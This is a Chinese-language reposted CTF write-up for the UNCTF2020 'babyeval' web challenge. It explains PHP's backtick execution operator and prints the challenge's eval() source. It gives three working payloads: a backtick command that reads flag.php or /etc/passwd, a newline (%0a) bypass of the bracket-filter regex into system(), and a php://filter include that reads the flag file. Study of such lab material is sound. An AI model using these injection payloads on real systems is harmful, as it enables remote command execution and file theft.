• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号
登陆 注册

UNCTF2020-WEB:babyeval(php执行运算符|php过滤括号|换行符绕过正则) ...

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

php执行运算符

代码:

<?php
    echo `base64 /etc/passwd`;
?>

 

上面的代码使用了反引号,PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回(即,可以赋给一个变量而不是简单地丢弃到标准输出)

如果过滤了括号可以使用执行运算符去绕过进行输出

 

题目源码:

<?php
    // flag在flag.php
    if(isset($_GET['a'])){
        if(preg_match('/\(.*\)/', $_GET['a']))
            die('hacker!!!');
        ob_start(function($data){
                 if (strpos($data, 'flag') !== false)
                 return 'ByeBye hacker';
                 return false;
                 });
        eval($_GET['a']);
    } else {
        highlight_file(__FILE__);
    }
    ?>

 

exp1:php执行运算符

GET /?a=echo `base64 flag.php`

 

exp2:换行符绕过(%0a)

GET /?a=system(%27%0acat%20f*%20|%20base64%27);

 

exp3:利用include函数加php伪协议

GET /a=include%20%27php://filter/convert.base64-encode/resource=./flag.php%27;

 


参考:https://www.php.net/manual/zh/language.operators.execution.php

          https://www.ctfwp.com/%E5%AE%98%E6%96%B9%E8%B5%9B%E4%BA%8B%E9%A2%98/2020UNCTF

鲜花
握手
雷人
路过
鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
More+
上一篇:
阿里云搭建个人网站:Ubuntu16.04+Nginx+Mysql+PHP 搭建wordpress发布时间:2022-07-10
下一篇:
./upload/forum.php发布时间:2022-07-10
热门推荐
More+
热门话题
More+
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap